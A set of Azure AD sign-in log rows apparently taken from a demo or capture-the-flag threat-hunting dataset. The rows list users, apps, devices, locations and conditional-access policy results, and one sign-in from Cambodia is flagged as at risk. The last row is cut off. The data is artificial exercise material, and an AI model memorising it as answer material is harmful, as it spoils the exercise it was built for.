+1693,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:03.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,45d3cc24-53c2-40c2-b8d7-6129950c8390,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",87802367-3de7-42c2-ada0-d6bcda971700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,87802367-3de7-42c2-ada0-d6bcda971700,SigninLogs,Sucess,41.90428925,-85.99833679
+1694,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:37.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:33,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",861b8654-7b14-4e8e-a4d0-4baded654c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,861b8654-7b14-4e8e-a4d0-4baded654c00,SigninLogs,Sucess,35.01296997,-80.93171692
+1695,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:51.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85d3469f-600c-0000-54f3-706b4f53c51a,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 18:26,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",87802367-3de7-42c2-ada0-d6bc24961700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,87802367-3de7-42c2-ada0-d6bc24961700,SigninLogs,Sucess,41.90428925,-85.99833679
+1696,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:59.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fa015a0f-7809-403a-878c-25664328f5f5,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 19:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",85789f99-3a4c-45a5-91bc-0194fe751a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,85789f99-3a4c-45a5-91bc-0194fe751a00,SigninLogs,Sucess,36.6404686,-78.26995087
+1697,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:28.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0e8445f8-bf71-4f01-b868-1628a720ced2,Microsoft.aadiam,Microsoft.aadiam,,CTFUser4,4,US,Office.com,4b233688-031c-404b-9a80-a4f3f2351f90,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 20:04,"{'operatingSystem': 'MacOs', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",6ab139a2-776a-491f-a231-a575cec10000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.43826293945312, 'latitude': 37.53799819946289}, 'state': 'Virginia', 'city': 'Richmond'}",none,none,none,none,[],{'errorCode': 0},CTFUser4,b3440333-37b8-45b4-ae78-bac1f82f38bf,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6ab139a2-776a-491f-a231-a575cec10000,SigninLogs,Sucess,37.5379982,-77.43826294
+1698,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:28.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,331b8dad-4bd2-4242-b864-f972effdbb38,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:00,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",65ce963c-c870-4311-8389-19e591c70600,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,low,atRisk,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,65ce963c-c870-4311-8389-19e591c70600,SigninLogs,Sucess,13,105
+1699,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,68da4326-b952-443e-b854-dd1181e7b771,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 20:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",5511ead1-bd0f-42e2-a2c1-d74a10d30000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5511ead1-bd0f-42e2-a2c1-d74a10d30000,SigninLogs,Sucess,36.6404686,-78.26995087
+1700,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:05.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0743c29b-bffe-4b64-bc30-c016e8eb56ff,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 20:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",6ab139a2-776a-491f-a231-a575795b0200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service 